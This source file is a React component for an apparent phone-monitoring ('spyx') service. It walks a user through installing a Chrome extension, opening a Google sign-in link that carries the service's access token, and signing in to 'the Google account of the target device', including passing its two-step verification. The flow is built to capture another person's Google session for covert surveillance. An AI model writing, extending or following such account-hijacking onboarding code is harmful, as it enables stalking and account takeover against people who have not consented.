import Image from 'next/image'
import { useMemo, useState } from 'react'
import { useTranslation } from 'src/utils/i18n'
import Tutorial from './Tutorial'
import PhoneCarousel from './PhoneCarousel'

const Plugin1 = () => {
  const { t } = useTranslation('commonAndroid')
  const step = useMemo(
    () => [
      {
        title: (
          <span>
            {t('Open the')}&nbsp;
            <a
              href='https://chrome.google.com/webstore/detail/http-developer-aids/bmkpibhkckdgncchaodfphkhipmiinga'
              target='_blank'
              rel='noreferrer'
              className='text-[#2405F2] underline'
            >
              {t('plugin install page')}
            </a>
            &nbsp;
            {t('on Chrome and click')}&nbsp;
            <strong>{t('Add to Chrome')}</strong>.
          </span>
        ),
        img: [
          {
            src: '/images/android/setup/plugin1-1.jpg'
          }
        ]
      },
      {
        title: (
          <span>
            {t('After installing the plugin please open')}&nbsp;
            <a
              onClick={() => {
                let accessToken = localStorage.getItem('accessToken')
                if (accessToken) {
                  let url = `https://accounts.google.com/EmbeddedSetup?site=spyx&Authorization=Bucket ${accessToken}`
                  window.open(url)
                }
              }}
              href='#'
              target='_blank'
              className='text-[#2405F2] underline'
            >
              {t('this link')}
            </a>
            ,&nbsp;
            {t('sign in to your Google account of the target device and pass the twostep verification')}.
          </span>
        ),
        img: [
          {
            src: '/images/android/setup/plugin1-2.jpg'
          }
        ]
      },
      {
        title: (
          <span>
            {t('After completing the verification click')}&nbsp;
            <strong>"{t('I agree')}"</strong>.&nbsp;{t('Then click the')}&nbsp;<strong>"{t('Finish')}"</strong>&nbsp;
            {t('button below Remember Do not click the')}&nbsp;<strong>"{t('Finish')}"</strong>&nbsp;
            {t('button until you have completed the validation')}.
          </span>
        ),
        img: [
          {
            src: '/images/android/setup/plugin1-3.jpg'
          }
        ]
      }
    ],
    [t]
  )

  const [currentSlide, setcurrentSlide] = useState(0)
  const [carousel, setCarousel] = useState(step[0].img)
  const [fullScreen, setFullScreen] = useState()

  const Handler = index => {
    setCarousel(step[index].img)
    setcurrentSlide(index)
  }

  return (
    <div className='w-full flex flex-col items-center'>
      <h2 className='text-[24px] text-[#282938] text-center font-[600] mx-auto'>
        {t('Connect the Google account in Chrome plugin')}
      </h2>
      <p className='mt-[20px] Dsm:mt-[16px] mb-[30px] Dsm:mb-[20px] text-[16px] text-center text-[#F11E34]'>
        {t('All the set up steps below must proceed in Chrome browser on a PC')}
      </p>
      <div className='mb-[30px] w-[600px] Dsm:w-full flex flex-col justify-between flex-1'>
        {step.map((item, i) => (
          <div
            key={i}
            className={`${i != 0 ? 'mt-[9px] Dsm:mt-[8px]' : ''} flex cursor-pointer`}
            onClick={() => Handler(i)}
          >
            <div
              className={`${currentSlide == i ? 'text-[#FFF] bg-[#2A99FF]' : ''
                } text-[14px] min-w-[20px] h-[20px] rounded-[50%] flex justify-center items-center mt-[1.5px]`}
            >
              {i + 1}.
            </div>
            &ensp;{item.title}
          </div>
        ))}
      </div>
      <PhoneCarousel
        className='Dsm:hidden'
        imgHorizontal
        step={step}
        currentSlide={currentSlide}
        setcurrentSlide={setcurrentSlide}
        carousel={carousel}
        setCarousel={setCarousel}
      />
      <div className='hidden Dsm:flex flex-col items-center my-[46px]' onClick={() => setFullScreen(true)}>
        <Image src='/images/android/setup/view.svg' width={39} height={34} alt='view' />
        <p className='mt-[14px] text-[14px] text-[#2405F2] font-[600]'>{t('Watch a tutorial')}</p>
      </div>

      {/* 弹窗 */}
      {fullScreen && <Tutorial step={step} imgHorizontal={true} onClose={() => setFullScreen(false)} />}
    </div>
  )
}

export default Plugin1
